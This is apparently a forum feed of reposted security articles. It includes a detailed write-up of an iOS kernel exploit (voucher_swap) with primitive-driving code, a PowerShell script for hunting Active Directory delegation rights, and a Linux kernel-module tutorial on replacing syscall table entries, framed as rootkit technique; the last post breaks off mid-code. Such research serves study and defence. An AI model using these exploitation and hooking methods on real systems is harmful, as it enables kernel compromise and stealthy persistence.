    if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
        ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
    ...
    OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);
    OutP->Head.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
    OutP->Head.msgh_size = (mach_msg_size_t)(sizeof(Reply));
    OutP->msgh_body.msgh_descriptor_count = 1;
}

Once again, assuming that a correct implementation doesn't leak or consume extra references, we can infer the following intended semantics for task_swap_mach_voucher():

- task_swap_mach_voucher() does not hold a reference on new_voucher; the new_voucher reference is borrowed and should not be consumed.
- task_swap_mach_voucher() holds a reference on the input value of old_voucher that it should consume.
- On failure, the output value of old_voucher should not hold any references on the pointed-to voucher object.
- On success, the output value of old_voucher holds a voucher reference donated from task_swap_mach_voucher() to _Xtask_swap_mach_voucher() that the latter consumes via convert_voucher_to_port().

With these semantics in mind, we can compare against the actual implementation. Here's the code from XNU 4903.221.2's osfmk/kern/task.c, presumably a placeholder implementation:

kern_return_t
task_swap_mach_voucher(
        task_t          task,
        ipc_voucher_t   new_voucher,
        ipc_voucher_t  *in_out_old_voucher)
{
    if (TASK_NULL == task)
        return KERN_INVALID_TASK;

    *in_out_old_voucher = new_voucher;
    return KERN_SUCCESS;
}

This implementation does not respect the intended semantics:

- The input value of in_out_old_voucher is a voucher reference owned by task_swap_mach_voucher(). By unconditionally overwriting it without first calling ipc_voucher_release(), task_swap_mach_voucher() leaks a voucher reference.
- The value new_voucher is not owned by task_swap_mach_voucher(), and yet it is being returned in the output value of in_out_old_voucher. This consumes a voucher reference that task_swap_mach_voucher() does not own.

Thus, task_swap_mach_voucher() actually contains two reference counting issues! We can leak a reference on a voucher by calling task_swap_mach_voucher() with the voucher as the third argument, and we can drop a reference on the voucher by passing the voucher as the second argument. This is a great exploitation primitive, since it offers us nearly complete control over the voucher object's reference count. (Further investigation revealed that thread_swap_mach_voucher() contained a similar vulnerability, but only the reference leak part, and changes in iOS 12 made the vulnerability unexploitable.)
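To make these primitives concrete, here is a minimal user-space sketch (my own illustration, not code from the original post) of how the two reference counting issues could be driven. It assumes the MIG-generated task_swap_mach_voucher() stub declared via <mach/mach.h>, where ipc_voucher_t is simply a mach_port_t naming the voucher:

#include <mach/mach.h>

/* Leak a reference: the port passed via the inout third argument is
 * converted to a voucher reference by the MIG wrapper, and the placeholder
 * implementation overwrites the pointer without ever releasing it. */
static kern_return_t leak_voucher_ref(mach_port_t voucher_port)
{
    mach_port_t old_voucher = voucher_port;
    return task_swap_mach_voucher(mach_task_self(), MACH_PORT_NULL, &old_voucher);
}

/* Drop a reference: new_voucher comes back through the inout parameter, so
 * the wrapper's convert_voucher_to_port() consumes a reference that the
 * service routine never owned. */
static kern_return_t drop_voucher_ref(mach_port_t voucher_port)
{
    mach_port_t old_voucher = MACH_PORT_NULL;
    return task_swap_mach_voucher(mach_task_self(), voucher_port, &old_voucher);
}

Calling leak_voucher_ref() or drop_voucher_ref() in a loop gives near-complete control over the target voucher's reference count, which is exactly the primitive the rest of the exploit builds on.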
On vouchers

In order to grasp the impact of this vulnerability, it's helpful to understand a bit more about Mach vouchers, although the full details aren't important for exploitation. Mach vouchers are represented by the type ipc_voucher_t in the kernel, with the following structure definition:

/*
 * IPC Voucher
 *
 * Vouchers are a reference counted immutable (once-created) set of
 * indexes to particular resource manager attribute values
 * (which themselves are reference counted).
 */
struct ipc_voucher {
    iv_index_t    iv_hash;        /* checksum hash */
    iv_index_t    iv_sum;         /* checksum of values */
    os_refcnt_t   iv_refs;        /* reference count */
    iv_index_t    iv_table_size;  /* size of the voucher table */
    iv_index_t    iv_inline_table[IV_ENTRIES_INLINE];
    iv_entry_t    iv_table;       /* table of voucher attr entries */
    ipc_port_t    iv_port;        /* port representing the voucher */
    queue_chain_t iv_hash_link;   /* link on hash chain */
};

As the comment indicates, an IPC voucher represents a set of arbitrary attributes that can be passed between processes via a send right in a Mach message. The primary client of Mach vouchers appears to be Apple's libdispatch library.

The only fields of ipc_voucher relevant to us are iv_refs and iv_port. The other fields are related to managing the global list of voucher objects and storing the attributes represented by a voucher, neither of which will be used in the exploit.

As of iOS 12, iv_refs is of type os_refcnt_t, which is a 32-bit reference count with allowed values in the range 1-0x0fffffff (that's 7 f's, not 8). Trying to retain or release a voucher with a reference count outside this range will trigger a panic.

iv_port is a pointer to the ipc_port object that represents this voucher to userspace. It gets initialized whenever convert_voucher_to_port() is called on an ipc_voucher with iv_port set to NULL.

In order to create a Mach voucher, you can call the host_create_mach_voucher() trap. This function takes a "recipe" describing the voucher's attributes and returns a voucher port representing the voucher. However, because vouchers are immutable, there is one quirk: if the resulting voucher's attributes are exactly the same as a voucher that already exists, then host_create_mach_voucher() will simply return a reference to the existing voucher rather than creating a new one.

That's out of line!

There are many different ways to exploit this bug, but in this post I'll discuss my favorite: incrementing an out-of-line Mach port pointer so that it points into pipe buffers.

Now that we understand what the vulnerability is, it's time to determine what we can do with it. As you'd expect, an ipc_voucher gets deallocated once its reference count drops to 0. Thus, we can use our vulnerability to cause the voucher to be unexpectedly freed. But freeing the voucher is only useful if the freed voucher is subsequently reused in an interesting way. There are three components to this: storing a pointer to the freed voucher, reallocating the freed voucher with something useful, and reusing the stored voucher pointer to modify kernel state. If we can't get any one of these steps to work, then the whole bug is pretty much useless.

Let's consider the first step, storing a pointer to the voucher. There are a few places in the kernel that directly or indirectly store voucher pointers, including struct ipc_kmsg's ikm_voucher field and struct thread's ith_voucher field.
Of these, the easiest to use is ith_voucher, since we can directly read and write this field's value from userspace by calling thread_get_mach_voucher() and thread_set_mach_voucher(). Thus, we can make ith_voucher point to a freed voucher by first calling thread_set_mach_voucher() to store a reference to the voucher, then using our voucher bug to remove the added reference, and finally deallocating the voucher port in userspace to free the voucher. Next consider how to reallocate the voucher with something useful. ipc_voucher objects live in their own zalloc zone, ipc.vouchers, so we could easily get our freed voucher reallocated with another voucher object. Reallocating with any other type of object, however, would require us to force the kernel to perform zone garbage collection and move a page containing only freed vouchers over to another zone. Unfortunately, vouchers don't seem to store any significant privilege-relevant attributes, so reallocating our freed voucher with another voucher probably isn't helpful. That means we'll have to perform zone gc and reallocate the voucher with another type of object. In order to figure out what type of object we should reallocate with, it's helpful to first examine how we will use the dangling voucher pointer in the thread's ith_voucher field. We have a few options, but the easiest is to call thread_get_mach_voucher() to create or return a voucher port for the freed voucher. This will invoke ipc_voucher_reference() and convert_voucher_to_port() on the freed ipc_voucher object, so we'll need to ensure that both iv_refs and iv_port are valid. But what makes thread_get_mach_voucher() so useful for exploitation is that it returns the voucher's Mach port back to userspace. There are two ways we could leverage this. If the freed ipc_voucher object's iv_port field is non-NULL, then that pointer gets directly interpreted as an ipc_port pointer and thread_get_mach_voucher() returns it to us as a Mach send right. On the other hand, if iv_port is NULL, then convert_voucher_to_port() will return a freshly allocated voucher port that allows us to continue manipulating the freed voucher's reference count from userspace. This brought me to the idea of reallocating the voucher using out-of-line ports. One way to send a large number of Mach port rights in a message is to list the ports in an out-of-line ports descriptor. When the kernel copies in an out-of-line ports descriptor, it allocates an array to store the list of ipc_port pointers. By sending many Mach messages containing out-of-line ports descriptors, we can reliably reallocate the freed ipc_voucher with an array of out-of-line Mach port pointers. Since we can control which elements in the array are valid ports and which are MACH_PORT_NULL, we can ensure that we overwrite the voucher's iv_port field with NULL. That way, when we call thread_get_mach_voucher() in userspace, convert_voucher_to_port() will allocate a fresh voucher port that points to the overlapping voucher. Then we can use the reference counting bug again on the returned voucher port to modify the freed voucher's iv_refs field, which will change the value of the out-of-line port pointer that overlaps iv_refs by any amount we want. Of course, we haven't yet addressed the question of ensuring that the iv_refs field is valid to begin with. As previously mentioned, iv_refs must be in the range 1-0x0fffffff if we want to reuse the freed ipc_voucher without triggering a kernel panic. 
The ipc_voucher structure is 0x50 bytes and the iv_refs field is at offset 0x8; since the iPhone is little-endian, this means that if we reallocate the freed voucher with an array of out-of-line ports, iv_refs will always overlap with the lower 32 bits of an ipc_port pointer. Let's call the Mach port that overlaps iv_refs the base port. Using either MACH_PORT_NULL or MACH_PORT_DEAD as the base port would result in iv_refs being either 0 or 0xffffffff, both of which are invalid. Thus, the only remaining option is to use a real Mach port as the base port, so that iv_refs is overwritten with the lower 32 bits of a real ipc_port pointer.

This is dangerous because if the lower 32 bits of the base port's address are 0 or greater than 0x0fffffff, accessing the freed voucher will panic. Fortunately, kernel heap allocation on recent iOS devices is pretty well behaved: zalloc pages will be allocated from the range 0xffffffe0xxxxxxxx starting from low addresses, so as long as the heap hasn't become too unruly since the system booted (e.g. because of a heap groom or lots of activity), we can be reasonably sure that the lower 32 bits of the base port's address will lie within the required range. Hence overlapping iv_refs with an out-of-line Mach port pointer will almost certainly work fine if the exploit is run after a fresh boot.

This gives us our working strategy to exploit this bug:

1. Allocate a page of Mach vouchers.
2. Store a pointer to the target voucher in the thread's ith_voucher field and drop the added reference using the vulnerability.
3. Deallocate the voucher ports, freeing all the vouchers.
4. Force zone gc and reallocate the page of freed vouchers with an array of out-of-line ports.
5. Overlap the target voucher's iv_refs field with the lower 32 bits of a pointer to the base port and overlap the voucher's iv_port field with NULL.
6. Call thread_get_mach_voucher() to retrieve a voucher port for the voucher overlapping the out-of-line ports.
7. Use the vulnerability again to modify the overlapping voucher's iv_refs field, which changes the out-of-line base port pointer so that it points somewhere else instead.
8. Once we receive the Mach message containing the out-of-line ports, we get a send right to arbitrary memory interpreted as an ipc_port.

Pipe dreams

So what should we get a send right to? Ideally we'd be able to fully control the contents of the fake ipc_port we receive without having to play risky games by deallocating and then reallocating the memory backing the fake port. Ian actually came up with a great technique for this in his multi_path and empty_list exploits using pipe buffers.

Our exploit so far allows us to modify an out-of-line pointer to the base port so that it points somewhere else. So, if the original base port lies directly in front of a bunch of pipe buffers in kernel memory, then we can leak voucher references to increment the base port pointer in the out-of-line ports array so that it points into the pipe buffers instead. At this point, we can receive the message containing the out-of-line ports back in userspace. This message will contain a send right to an ipc_port that overlaps one of our pipe buffers, so we can directly read and write the contents of the fake ipc_port's memory by reading and writing the overlapping pipe's file descriptors.

tfp0

Once we have a send right to a completely controllable ipc_port object, exploitation is basically deterministic.
We can build a basic kernel memory read primitive using the same old pid_for_task() trick: convert our port into a fake task port such that the fake task's bsd_info field (which is a pointer to a proc struct) points to the memory we want to read, and then call pid_for_task() to read the 4 bytes overlapping bsd_info->p_pid. Unfortunately, there's a small catch: we don't know the address of our pipe buffer in kernel memory, so we don't know where to make our fake task port's ip_kobject field point. We can get around this by instead placing our fake task struct in a Mach message that we send to the fake port, after which we can read the pipe buffer overlapping the port and get the address of the message containing our fake task from the port's ip_messages.imq_messages field. Once we know the address of the ipc_kmsg containing our fake task, we can overwrite the contents of the fake port to turn it into a task port pointing to the fake task, and then call pid_for_task() on the fake task port as usual to read 4 bytes of arbitrary kernel memory. An unfortunate consequence of this approach is that it leaks one ipc_kmsg struct for each 4-byte read. Thus, we'll want to build a better read primitive as quickly as possible and then free all the leaked messages. In order to get the address of the pipe buffer we can leverage the fact that it resides at a known offset from the address of the base port. We can call mach_port_request_notification() on the fake port to add a request that the base port be notified once the fake port becomes a dead name. This causes the fake port's ip_requests field to point to a freshly allocated array containing a pointer to the base port, which means we can use our memory read primitive to read out the address of the base port and compute the address of the pipe buffer. At this point we can build a fake kernel task inside the pipe buffer, giving us full kernel read/write. Next we allocate kernel memory with mach_vm_allocate(), write a new fake kernel task inside that memory, and then modify the fake port pointer in our process's ipc_entry table to point to the new kernel task instead. Finally, once we have our new kernel task port, we can clean up all the leaked memory. And that's the complete exploit! You can find exploit code for the iPhone XS, iPhone XR, and iPhone 8 here: voucher_swap. A more in-depth, step-by-step technical analysis of the exploit technique is available in the source code. Bug collision I reported this vulnerability to Apple on December 6, 2018, and by December 19th Apple had already released iOS 12.1.3 beta build 16D5032a which fixed the issue. Since this would be an incredibly quick turnaround for Apple, I suspected that this bug was found and reported by some other party first. I subsequently learned that this bug was independently discovered and exploited by Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team. Amusingly, we were both led to this bug through semaphore_destroy(); thus, I wouldn't be surprised to learn that this bug was broadly known before being fixed. SorryMybad used this vulnerability as part of a remote jailbreak for the Tianfu Cup; you can read about his strategy for obtaining tfp0. Conclusion This post looked at the discovery and exploitation of P0 issue 1731, an IPC voucher reference counting issue rooted in failing to follow MIG semantics for inout objects. 
When run a few seconds after a fresh boot, the exploit strategy discussed here is quite reliable: on the devices I've tested, the exploit succeeds upwards of 99% of the time. The exploit is also straightforward enough that, when successful, it allows us to clean up all leaked resources and leave the system in a completely stable state. In a way, it's surprising that such "easy" vulnerabilities still exist: after all, XNU is open source and heavily scrutinized for valuable bugs like this. However, MIG semantics are very unintuitive and don't align well with the natural patterns for writing secure kernel code. While I'd love to believe that this is the last major MIG bug, I wouldn't be surprised to see at least a few more crop up. This bug is also a good reminder that placeholder code can also introduce security vulnerabilities and should be scrutinized as tightly as functional code, no matter how simple it may seem. And finally, it's worth noting that the biggest headache for me while exploiting this bug, the limited range of allowed reference count values, wasn't even an issue on iOS versions prior to 12. On earlier platforms, this bug would have always been incredibly reliable, not just directly after a clean boot. Thus, it's good to see that even though os_refcnt_t didn't stop this bug from being exploited, the mitigation at least impacts exploit reliability, and probably decreases the value of bugs like this to attackers. My next post will show how to use this exploit to analyze Apple's implementation of Pointer Authentication, culminating in a technique that allows us to forge PACs for pointers signed with the A keys. This is sufficient to call arbitrary kernel functions or execute arbitrary code in the kernel via JOP. Posted by Ben at 10:15 AM Sursa: https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html
  7. Nytro

    Why...???

    Most likely you send them a request to be removed from the blacklist. How and where? I have no idea.
  8. Nytro

    Why...???

    Their search engine probably found who knows what interesting things on our site (e.g. code?) and RST got blacklisted.
  9. Yes, the age limit must be respected. It's important: this year the competition will take place in Romania, and it would be good for Romania to make a good impression. I recommend that everyone passionate about security sign up. A few details about how it went last year are available in the presentation by one of the guys who participated last year:
  10. Registration has opened for the European Cyber Security Championship 2019

Recommended | Ioana Tanase | Tuesday, 29 January 2019, 12:29

A new meeting dedicated to organizing the European Cyber Security Championship (ECSC) in Romania took place at the CERT-RO headquarters. The meeting was attended by representatives of CERT-RO, SRI and ANSSI, the traditional organizers of the competition in Romania, as well as by supporters and potential sponsors from the public and private sectors. The discussions focused on organizing the national phase of the competition, as well as the final stage in October, which will take place in Bucharest.

ECSC is a European-level competition centered on cyber security. The project is supported annually by the European Union Agency for Network and Information Security (ENISA). Within ECSC, the teams of each participating state take part both in collaborative exercises and in competition. The championship's challenges cover areas such as web security, mobile security, cryptographic puzzles, reverse engineering and forensics. The competition has a national stage, through which Romania's team is selected and prepared for the final contest at the European level.

Participants who want to enter the competition must meet the following criteria:

- aged between 16 and 25;
- citizens of the country they compete for, or living in and attending a form of education in that country.

Teams consist of 2 (maximum 3) coaches and a maximum of 10 competitors in 2 categories: 5 juniors (aged 16 to 20) and 5 seniors (aged 21 to 25). The reference age is the competitor's age at the end of the calendar year.

In 2018, Romania's team took second place out of a total of 10 countries participating in that year's edition of the European Cyber Security Championship (ECSC), held in Duesseldorf, Germany, between 7 and 10 November 2018. This is the best performance Romania has achieved in the European competition, owed both to the experience gained in the previous edition and the sustained training of the team members throughout the year, as well as to the dedication of the instructors who stood by the 10 members of the squad. At the same time, Romania's team enjoyed the jury's appreciation, being designated for the second year in a row as the team with the best presentation of how they solved the competition tasks.

Registration: http://www.cybersecuritychallenge.ro/

Sursa: https://www.monitoruldegalati.ro/national/s-au-deschis-inscrierile-pentru-campionatul-european-de-securitate-cibernetica-2019.html
  11. ShellcodeCompiler was updated! It now uses @keystone_engine to assemble shellcodes! https://github.com/NytroRST/ShellcodeCompiler
  12. Bug fixed: http://xssfuzzer.com/
  13. I abused energy drinks and it wasn't good. I gave them up completely. Sleep is the foundation. Get as much as you can; it's useful from many points of view and no substance can replace it.
  14. It depends on you. They are different things. A pentester is more on the "attacker" side, while a security analyst is more on the defense side.
  15. Hunting the Delegation Access

January 17, 2019

Active Directory (AD) delegation is a fascinating subject, and we have previously discussed it in a blog post and later in a webinar. To summarize, Active Directory has a capability to delegate certain rights to non (domain/forest/enterprise) admin users to perform administrative tasks over a specific section of AD. This capability, if misconfigured, can become a major reason for AD compromise. Earlier we only talked about manual analysis for finding such delegations. Another article, which can be found here, covered multiple other tools which can help in such manual analysis. Today, we are going to look at other possible options to hunt for these delegations across a network in a (semi-)automated manner via scripts.

Setting the scene

We'll assume the following scenario:

- We have previously compromised a low privilege domain user with severe restrictions, such as PowerShell execution disabled via AppLocker.
- We have compromised local admin access on a domain joined machine. This local admin access allows us to run unrestricted PowerShell scripts; however, we would require a domain login to perform enumeration on the AD domain.

To achieve that, we will use two different approaches:

- Using ADACLScanner (semi automated), and
- Using a custom PowerShell script by NSS (fully automated)

Using ADACLScanner

This tool is written by canix1 and is useful for generic ACL scanning. It can be found on GitHub (https://github.com/canix1/ADACLScanner). We can repurpose this tool to perform the tasks of AD delegation hunting. We will explain this process with the help of an example below.

When you run the PowerShell script from ADACLScanner, you are greeted with a nice GUI (one of the rare PowerShell tools with a nice GUI).

[Image: ADACLScanner]

So let's say we connect to an AD named "plum", available at 192.168.3.215, as shown in the screenshot below.

[Image: Connecting to AD]

When we click on connect in the first column, we will be prompted to enter a domain credential so that it can enumerate the node. It should be noted that this domain credential could be of any low privilege user in the domain.

[Image: Requesting Domain Credentials]

Once we enter the domain credentials correctly, we will be shown the available nodes, as shown below.

[Image: Listing AD Nodes]

Now all we have to do is highlight the node in the first column, make sure "inherited permissions" is unticked and click on "run scan". In the above scenario we selected the highest node, that is "DC=plum,DC=local". The report that is generated after the scan is completed will look somewhat as shown below.

[Image: ACL Scanner Report]

If we highlight the Regions node and run the scan, the report will look somewhat different. You can notice that the Object column in the report gives you details of the node for which the ACL report has been extracted. So the OU here is Regions.

[Image: ACL Report for Regions OU]

Similarly, if you run the scan for the USA OU from the objects column as shown below, the report will state the delegation permissions for the USA OU.

[Image: AD ACL Scanner report for OU USA]

The hassle here is that you have to manually hunt every node and then analyze every entry to find the correct delegation. This is fine for a small network, but the task may become a nightmare if you are dealing with a large network. This is where our second approach could be useful.
Using a custom PowerShell script by NSS

Let me first show you the working of this script, which has been prepared by our team. If you are only concerned about the automated script, here is the online version of it: go and grab it. If you are interested in the internal workings of the script, here is a block-by-block breakdown.

Getting User Credentials and AD Drive Hack

We started with a non-domain, but local admin, user. This is the reason that we get the below listed error whenever we try to mount an AD drive or import Active Directory modules.

[Image: AD Module Import Error]

To get around this, we passed the "-WarningAction SilentlyContinue" parameter. Let us dissect the script; the first bit reads like below:

Import-Module ActiveDirectory -WarningAction SilentlyContinue

# force use of specified credentials everywhere
$creds = Get-Credential
$PSDefaultParameterValues = @{"*-AD*:Credential"=$creds}

# Get DC name
$dcname = (Get-ADDomainController).Name
New-PSDrive -Name AD -PSProvider ActiveDirectory -Server $dcname -Root //RootDSE/ -Credential $creds
Set-Location AD:

Here is a better understanding of the commands listed above:

- Since we are performing actions as a non domain user, we started by importing the "ActiveDirectory" module with "-WarningAction SilentlyContinue". This allowed us to import the module, but the AD drive was not mounted.
- Next we attempted to get credentials from the user. Once the user credentials were added, we set "PSDefaultParameterValues" for all commands with "-AD" in them.
- Now we attempted to mount the AD drive with this newly acquired credential, and for this we needed a server name, which was seamlessly obtained using the "Get-ADDomainController" commandlet.

This would not be required if you are already logged in as a domain user. However, we wanted to take the worst case scenario, where you might have access to a system as a local admin (hence unrestricted PowerShell access) but only limited domain user credentials.

Navigating the Entire OU

# Get all Domain Names, Organization Units, and individual AD objects
$OUs = @(Get-ADDomain | Select-Object -ExpandProperty DistinguishedName)
$OUs += Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName
$OUs += Get-ADObject -SearchBase (Get-ADDomain).DistinguishedName -SearchScope OneLevel -LDAPFilter '(objectClass=container)' | Select-Object -ExpandProperty DistinguishedName

Let us understand what happens here: the first line executes "Get-ADDomain" and fetches the "DistinguishedName" column. The second line adds to the $OUs object the output of "Get-ADOrganizationalUnit", with a starting filter of "*", taking the distinguished names from those objects. The third line fetches the AD objects under the AD domain's distinguished name, taking only one level, with an LDAP filter where the object class is "container", and prints out the "DistinguishedName" column.

Adding Exclusions

$domain = (Get-ADDomain).Name
$groups_to_ignore = ( "$domain\Enterprise Admins", "$domain\Domain Admins")
# 'NT AUTHORITY\SYSTEM', 'S-1-5-32-548', 'NT AUTHORITY\SELF'

These lines show how we are adding more exclusions to the list. We are first fetching the domain name and, after that, providing a list of groups to be ignored.

Extracting Relevant Domain User/Group Permissions

ForEach ($OU in $OUs) {
    $report += Get-Acl -Path "AD:\$OU" |
    Select-Object -ExpandProperty Access |
    ? {$_.IdentityReference -match "$domain*" -and $_.IdentityReference -notin $groups_to_ignore} |
    Select-Object @{name='organizationalUnit';expression={$OU}}, `
    @{name='objectTypeName';expression={if ($_.objectType.ToString() -eq '00000000-0000-0000-0000-000000000000') {'All'} Else {$schemaIDGUID.Item($_.objectType)}}}, `
    @{name='inheritedObjectTypeName';expression={$schemaIDGUID.Item($_.inheritedObjectType)}}, `
    *
}

As we saw previously in the second step (i.e. during navigation), we stored all the information in $OUs; now we are using a "ForEach" loop to extract all the information and process it. The first three lines in the ForEach loop fetch the ACL of each entity in $OUs, ensuring there is a match of "IdentityReference" with the domain and that it is not part of the groups-to-ignore list (shown in the previous step). Continuing from line 4, the command selects objects such as organizationalUnit, with an expression of the entity in $OUs, and "objectTypeName", with the condition that if the object type is equal to the root GUID it displays 'All'; otherwise it fetches the details of the "schemaIDGUID" based on the object type value.

Inheritance == False

Inheritance set to false is the key to everything. We need only the lines where inheritance is false:

$filterrep = $report | Where-Object {-not $_.IsInherited}

This ensures that inherited objects are not shown in the output.

Array to Console Table

Write-Output ( $filterrep | Select-Object OrganizationalUnit,ObjectTypeName,ActiveDirectoryRights,IdentityReference | Format-Table | Out-String)

This finally results in a neatly formatted table with a list of users having any non-inherited, i.e. delegated, rights on specific objects. By default, delegated rights cascade down the OU tree, so if a top-level OU has the rights, they automatically cascade down to the OUs below unless explicitly removed.

[Image: Result of Automated Script]

<shameless plug> This, and other such useful techniques, have been demonstrated in our latest Advanced Infrastructure Hacking course – 2019 edition. We also provide in-house training and CTFs for internal security and SOC teams to help them advance their skill sets. </shameless plug>

Sursa: https://www.notsosecure.com/hunting-the-delegation-access/
  16. How to write a rootkit without really trying

POST JANUARY 17, 2019 LEAVE A COMMENT

We open-sourced a fault injection tool, KRF, that uses kernel-space syscall interception. You can use it today to find faulty assumptions (and resultant bugs) in your programs. Check it out!

This post covers intercepting system calls from within the Linux kernel, via a plain old kernel module. We'll go through a quick refresher on syscalls and why we might want to intercept them and then demonstrate a bare-bones module that intercepts the read(2) syscall.

But first, you might be wondering: What makes this any different from $other_fault_injection_strategy?

Other fault injection tools rely on a few different techniques:

- There's the well-known LD_PRELOAD trick, which really intercepts the syscall wrapper exposed by libc (or your language runtime of choice). This often works (and can be extremely useful for e.g. spoofing the system time within a program or using SOCKS proxies transparently), but comes with some major downsides:
  - LD_PRELOAD only works when libc (or the target library of choice) has been dynamically linked, but newer languages (read: Go) and deployment trends (read: fully static builds and non-glibc Linux containers) have made dynamic linkage less popular.
  - Syscall wrappers frequently deviate significantly from their underlying syscalls: depending on your versions of Linux and glibc, open() may call openat(2), fork() may call clone(2), and other calls may modify their flags or default behavior for POSIX compliance. As a result, it can be difficult to reliably predict whether a given syscall wrapper invokes its syscall namesake.
- Dynamic instrumentation frameworks like DynamoRIO or Intel PIN can be used to identify system calls at either the function or machine-code level and instrument their calls and/or returns. While this grants us fine-grained access to individual calls, it usually comes with substantial runtime overhead.

Injecting faults within kernelspace sidesteps the downsides of both of these approaches: it rewrites the actual syscalls directly instead of relying on the dynamic loader, and it adds virtually no runtime overhead (beyond checking to see whether a given syscall is one we'd like to fault).

What makes this any different from $other_blog_post_on_syscall_interception?

Other blog posts address the interception of syscalls, but many:

- Grab the syscall table by parsing their kernel's System.map, which can be unreliable (and is slower than the approach we give below).
- Assume that the kernel exports sys_call_table and that extern void *sys_call_table will work (not true on Linux 2.6+).
- Involve prodding large ranges of kernel memory, which is slow and probably dangerous.

Basically, we couldn't find a recent (>2015) blog post that described a syscall interception process that we liked. So we developed our own.

Why not just use eBPF or kprobes?

eBPF can't intercept syscalls. It can only record their parameters and return types. The kprobes API might be able to perform interception from within a kernel module, although I haven't come across a really good source of information about it online. In any case, the point here is to do it ourselves!

Will this work on $architecture?

For the most part, yes. You'll need to make some adjustments to the write-unlocking macro for non-x86 platforms.

What's a syscall?

A syscall, or system call, is a function[1] that exposes some kernel-managed resource (I/O, process control, networking, peripherals) to user-space processes.
Any program that takes user input, communicates with other programs, changes files on disk, uses the system time, or contacts another device over a network (usually) does so via syscalls.[2] The core UNIX-y syscalls are fairly primitive: open(2), close(2), read(2), and write(2) for the vast majority of I/O; fork(2), kill(2), signal(2), exit(2), and wait(2) for process management; and so forth.

The socket management syscalls are mostly bolted on to the UNIX model: send(2) and recv(2) behave much like read(2) and write(2), but with additional transmission flags. ioctl(2) is the kernel's garbage dump, overloaded to perform every conceivable operation on a file descriptor where no simpler means exists. Despite these additional complexities in usage, the underlying principle behind their usage (and interception) remains the same. If you'd like to dive all the way in, Filippo Valsorda maintains an excellent Linux syscall reference for x86 and x86_64.

Unlike regular function calls in user-space, syscalls are extraordinarily expensive: on x86 architectures, int 80h (or the more modern sysenter/syscall instructions) causes both the CPU and the kernel to execute slow interrupt-handling code paths as well as perform a privilege-context switch.[3]

Why intercept syscalls?

For a few different reasons:

- We're interested in gathering statistics about a given syscall's usage, beyond what eBPF or another instrumentation API could (easily) provide.
- We're interested in fault injection that can't be avoided by static linking or manual syscall(3) invocations (our use case).
- We're feeling malicious, and we want to write a rootkit that's hard to remove from user-space (and possibly even kernel-space, with a few tricks).[4]

Why do I need fault injection?

Fault injection finds bugs in places that fuzzing and conventional unit testing often won't:

- NULL dereferences caused by assuming that particular functions never fail (are you sure you always check whether getcwd(2) succeeds? Are you sure you're doing better than systemd?)
- Memory corruption caused by unexpectedly small buffers, or disclosure caused by unexpectedly large buffers
- Integer over/underflow caused by invalid or unexpected values (are you sure you're not making incorrect assumptions about stat(2)'s atime/mtime/ctime fields?)

Getting started: Finding the syscall table

Internally, the Linux kernel stores syscalls within the syscall table, an array of __NR_syscalls pointers. This table is defined as sys_call_table, but has not been directly exposed as a symbol (to kernel modules) since Linux 2.5. First thing, we need to get the syscall table's address, ideally without using the System.map file or scanning kernel memory for well-known addresses. Luckily for us, Linux provides a superior interface to either of these: kallsyms_lookup_name. This makes retrieving the syscall table as easy as:

static unsigned long *sys_call_table;

int init_module(void)
{
  sys_call_table = (void *)kallsyms_lookup_name("sys_call_table");

  if (sys_call_table == NULL) {
    printk(KERN_ERR "Couldn't look up sys_call_table\n");
    return -1;
  }

  return 0;
}

Of course, this only works if your Linux kernel was compiled with CONFIG_KALLSYMS=1. Debian and Ubuntu provide this, but you may need to test in other distros. If your distro doesn't enable kallsyms by default, consider using a VM for one that does (you weren't going to test this code on your host, were you?).
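One quick aside of my own (not from the original post): once kallsyms_lookup_name() hands back a candidate address, it is cheap to cross-check it against a second symbol before patching anything. A minimal sketch, assuming a kernel that still exposes its read(2) handler under the name "sys_read" (handler naming varies across kernel versions):

/* Returns nonzero if the table's read(2) entry matches the address kallsyms
 * reports for sys_read -- a cheap sanity check that we found the real table. */
static int syscall_table_looks_sane(unsigned long *table)
{
  unsigned long addr = kallsyms_lookup_name("sys_read");

  return addr != 0 && table[__NR_read] == addr;
}

Bailing out of init_module() when this check fails is much friendlier than scribbling over whatever memory a stale or wrong lookup happened to point at.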
Injecting our replacement syscalls

Now that we have the kernel's syscall table, injecting our replacement should be as easy as:

static unsigned long *sys_call_table;

static typeof(sys_read) *orig_read;

/* asmlinkage is important here -- the kernel expects syscall parameters to be
 * on the stack at this point, not inside registers. */
asmlinkage long phony_read(int fd, char __user *buf, size_t count)
{
  printk(KERN_INFO "Intercepted read of fd=%d, %lu bytes\n", fd, count);

  return orig_read(fd, buf, count);
}

int init_module(void)
{
  sys_call_table = (void *)kallsyms_lookup_name("sys_call_table");

  if (sys_call_table == NULL) {
    printk(KERN_ERR "Couldn't look up sys_call_table\n");
    return -1;
  }

  orig_read = (typeof(sys_read) *)sys_call_table[__NR_read];
  sys_call_table[__NR_read] = (void *)&phony_read;

  return 0;
}

void cleanup_module(void)
{
  /* Don't forget to fix the syscall table on module unload, or you'll be in
   * for a nasty surprise! */
  sys_call_table[__NR_read] = (void *)orig_read;
}

...but it isn't that easy, at least not on x86: sys_call_table is write-protected by the CPU itself. Attempting to modify it will cause a page fault (#PF) exception.[5] To get around this, we twiddle the 16th bit of the cr0 register, which controls the write-protect state:

#define CR0_WRITE_UNLOCK(x) \
  do { \
    write_cr0(read_cr0() & (~X86_CR0_WP)); \
    x; \
    write_cr0(read_cr0() | X86_CR0_WP); \
  } while (0)

Then, our insertions become a matter of:

CR0_WRITE_UNLOCK({
  sys_call_table[__NR_read] = (void *)&phony_read;
});

and:

CR0_WRITE_UNLOCK({
  sys_call_table[__NR_read] = (void *)orig_read;
});

and everything works as expected...almost. We've assumed a single processor; there's an SMP-related race condition bug in the way we twiddle cr0. If our kernel task were preempted immediately after disabling write-protect and placed onto another core with WP still enabled, we'd get a page fault instead of a successful memory write. The chances of this happening are pretty slim, but it doesn't hurt to be careful by implementing a guard around the critical section:

#define CR0_WRITE_UNLOCK(x) \
  do { \
    unsigned long __cr0; \
    preempt_disable(); \
    __cr0 = read_cr0() & (~X86_CR0_WP); \
    BUG_ON(unlikely((__cr0 & X86_CR0_WP))); \
    write_cr0(__cr0); \
